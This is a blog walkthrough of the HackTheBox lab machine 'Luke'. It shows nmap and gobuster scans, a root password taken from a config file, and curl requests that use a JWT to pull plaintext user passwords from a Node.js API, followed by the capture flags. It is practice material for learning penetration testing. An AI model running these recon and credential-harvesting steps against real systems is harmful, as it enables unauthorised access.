Skip to main content

Hackthebox Luke Walkthrough

LUKE -10.10.10.137

Nmap scan result-
nmap -sC -sV 10.10.10.137
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-18 23:03 IST
Nmap scan report for 10.10.10.137
Host is up (0.20s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
22/tcp   open  ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
3000/tcp open  http    Node.js Express framework
8000/tcp open  http    Ajenti http control panel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.94 seconds


gobuster-
10.10.10.137-
gobuster dir -u http://10.10.10.137 -w '/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt' -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.137
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2019/09/18 23:01:56 Starting gobuster
===============================================================
/login.php (Status: 200)
/member (Status: 301)
/management (Status: 401)
/css (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/config.php (Status: 200)
/LICENSE (Status: 200)

gobuster-
10.10.10.137:3000

gobuster dir -u http://10.10.10.137:3000 -w '/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt'
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.137:3000
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/09/18 23:02:24 Starting gobuster
===============================================================
/login (Status: 200)
/users (Status: 200)
/Login (Status: 200)
/Users (Status: 200)

Creds--
config.php(10.10.10.137)-root:Zk6heYCyv6ZE9Xcg

  


Auth-
Curl post request----

curl -XPOST http://10.10.10.137:3000/login -d 'username=admin&password=Zk6heYCyv6ZE9Xcg';echo
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODI4OTk1LCJleHAiOjE1Njg5MTUzOTV9.uhbegEBouu6vqm3QtxY5gYWbpuIcw1_sKbxY6sYtves"}

echo -n eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODI4OTk1LCJleHAiOjE1Njg5MTUzOTV9.uhbegEBouu6vqm3QtxY5gYWbpuIcw1_sKbxY6sYtves"} |base64 -d

Information about the token:-
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
data
eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODI4OTk1LCJleHAiOjE1Njg5MTUzOTV9.
signature
uhbegEBouu6vqm3QtxY5gYWbpuIcw1_sKbxY6sYtves
jwt type encoded
hs256 algo

curl http://10.10.10.137:3000/ -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' ; echo
{"message":"Welcome admin ! "}

curl http://10.10.10.137:3000/users -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   181  100   181    0     0    460      0 --:--:-- --:--:-- --:--:--   459
[
  {
    "ID": "1",
    "name": "Admin",
    "Role": "Superuser"
  },
  {
    "ID": "2",
    "name": "Derry",
    "Role": "Web Admin"
  },
  {
    "ID": "3",
    "name": "Yuri",
    "Role": "Beta Tester"
  },
  {
    "ID": "4",
    "name": "Dory",
    "Role": "Supporter"
  }
]

 Admin pass
curl http://10.10.10.137:3000/users/Admin -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    45  100    45    0     0     81      0 --:--:-- --:--:-- --:--:--    81
{
  "name": "Admin",
  "password": "WX5b7)>/rp$U)FW"




Derry pass

curl http://10.10.10.137:3000/users/Derry -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    46  100    46    0     0     21      0  0:00:02  0:00:02 --:--:--    21
{
  "name": "Derry",
  "password": "rZ86wwLvx7jUxtch"

 yuri pass 

  curl http://10.10.10.137:3000/users/Yuri -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    41  100    41    0     0     94      0 --:--:-- --:--:-- --:--:--    94
{
  "name": "Yuri",
  "password": "bet@tester87"
 
  duri pass


curl http://10.10.10.137:3000/users/Dory -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    44  100    44    0     0    109      0 --:--:-- --:--:-- --:--:--   109
{
  "name": "Dory",
  "password": "5y:!xa=ybfe)/QD"

port 8000

root:KpMasng6S5EtTy9Z


 10.10.10.137/8000  - passward & user root





 cat user.txt-- 58d441e500e8941f9cf3ba
 root-8448343028fadde1e2a1b  



                                                                                                                                  
                                                                                                                                                                                                                                                         


Labels:

Comments

Post a Comment

Popular posts from this blog

NMAP and ZenMAP

NMAP and ZenMAP are useful tools for the scanning phase of Ethical Hacking in Kali Linux. NMAP and ZenMAP are practically the same tool, however NMAP uses command line while ZenMAP has a GUI. NMAP is a free utility tool for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. NMAP uses raw IP packets in novel ways to determine which hosts are available on the network, what services (application name and version) those hosts are offering, which operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, etc. Now, let’s go step by step and learn how to use NMAP and ZenMAP. Step 1 − To open, go to Applications → 01-Information Gathering → nmap or zenmap. Step 2 − The next step is to detect the OS type/version of the target host. Based on the help indicat...
Post a Comment
Read more

Kali Linux - Installation and Configuration

Kali Linux is one of the best security packages of an ethical hacker, containing a set of tools divided by the categories. It is an open source and its official webpage is https://www.kali.org. Generally, Kali Linux can be installed in a machine as an Operating System, as a virtual machine . Installing Kali Linux is a practical option as it provides more options to work and combine the tools. You can also create a live boot CD or USB. All this can be found in the following link: https://www.kali.org/downloads/ BackTrack was the old version of Kali Linux distribution. The latest release is Kali 2018.1 and it is updated very often. To install Kali Linux − First, we will download the Virtual box  or Vmware workstation and install it. Later, we will download and install Kali Linux distribution. Instead of downloading  the images file you all can download that ova file extension . The benefits of it is that you do not have to install it. What you have to do is to just ...
Post a Comment
Read more

networks nd networking 1

Types Of Network •LAN - Local Area Network is in a small geographical area, such as a college or office building. •WAN - Wide Area Network Combination of multiple LANs. •WLAN - Wireless Local Area Network Links two or more devices using some wireless distribution method and usually providing a connection through an access point to the wider internet. Local Area Network (LAN) •A LAN connects network devices within a limited geographical area such as office buildings or schools. •The data transfer is managed by a transport protocol such as TCP/IP. •The transmission of data is performed by the access method (Ethernet, Token Ring, etc.). Wide Area Network (WAN) •A WAN covers a wide geographic area, carrying data over long distances, such as a country •WANs can be formed by different LANs •The connection between different LANs may not be permanent •WANs are sophisticated networks, but transmission speeds have generally been slower than those commonly achieved on LANs WLAN (Wireles...
Post a Comment
Read more